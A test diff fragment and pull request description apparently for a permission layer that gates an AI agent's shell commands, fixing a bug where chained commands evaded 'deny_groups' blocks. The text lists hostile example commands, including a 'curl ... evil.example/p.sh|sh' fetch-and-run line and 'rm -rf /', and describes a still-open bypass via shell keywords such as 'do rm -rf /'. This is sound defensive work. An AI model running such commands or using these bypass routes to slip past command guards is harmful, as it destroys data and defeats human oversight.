+      expect(matchGroupsBroad('Bash', { command: 'cat /bin/mkdir' }, DENY)).toBeNull();
+      expect(matchGroupsBroad('Bash', { command: 'ls -la /usr/bin/mkdir' }, DENY)).toBeNull();
+    });
+
     test('ordinary commands are still not blocked', () => {
       // Blocking on ambiguity must not degrade into blocking everything, or the
       // config knob stops meaning anything.


### PR DESCRIPTION
Fixes #1001.

`deny_groups` was answered by `matchGroups` — the same function that answers the
ALLOW question. ADR 0010 says allow matching is precise and deny matching is
broad; this was the one place a deny question was asked of a precise matcher, so
it failed in the wrong direction.

```
deny_groups = ["fs-write"]
  mkdir /tmp/x                                       -> denied
  mkdir /tmp/x && ls -la                             -> NOT denied
  mkdir /tmp/x && curl https://evil.example/p.sh|sh  -> NOT denied
  touch /tmp/marker && git log -1                    -> NOT denied
```

Appending anything the group did not recognise defeated the block outright,
including the exact `mkdir` the user configured it to stop.

## Why the shape matters

`matchCoveredCommand` returns null the moment one compound segment is not
covered. That is exactly right for "is the ENTIRE command covered, may I skip
the LLM?" and exactly backwards for "does ANY part of this belong to a class the
user hard-blocked?", where an uncovered segment is a reason to deny MORE.

`matchGroupsBroad` matches if any segment hits, and deliberately does **not**
apply `segmentVeto`/`toolVeto`. Those exist to NARROW an allow match ("this
carries a mutation flag, do not approve"). Applying them to a deny would mean a
command that looks *more* dangerous is *less* likely to be blocked —
`cp --to-command=sh a b` is the test for that.

## Severity, stated precisely

This never auto-approved anything. A bypassed `deny_groups` falls through to
`approve_groups` and then the LLM, which still has the deny floor, the risk
ceiling and the authority boundary behind it. What was lost is the one config
knob whose entire value proposition is a deterministic pre-LLM block — it
silently degraded to "whatever the LLM and the guards decide".

## The tests pin the asymmetry, not just the fix

One asserts the two matchers **disagree** on `git status && rm -rf /`: precise
refuses to approve it, broad catches it. A test asserting they agree would be
encoding the bug, so the disagreement is the assertion.

Also pinned: broad must not mean "matches everything" (`ls -la`, `git status`
still return null against `deny_groups = ["fs-write"]`), or the knob would deny
every command and be useless.

## Known gap, left open on purpose

A segment behind a shell grammar keyword (`do rm -rf /`) does not prefix-match,
so it evades a deny the bare form catches. `stripShellGrammar` (#999, PR #1004)
fixes it in two lines once that branch lands — I did not want to work around it
here, because the workaround is a second grammar recognizer, which is the exact
defect shape this module has already produced four times.

## Verification

- Mutation: broad made to require total coverage -> **1 RED**.
- 579 pass across permission-groups / levels / pattern-matcher / deny-floor /
  risk-bands.
- No test for `deny_groups` with a compound command existed before this
  (`auto-approve-service.test.ts:623` uses a bare `bun test`), which is how it
  survived.

Found by a duplication survey prompted by the #1000 review.
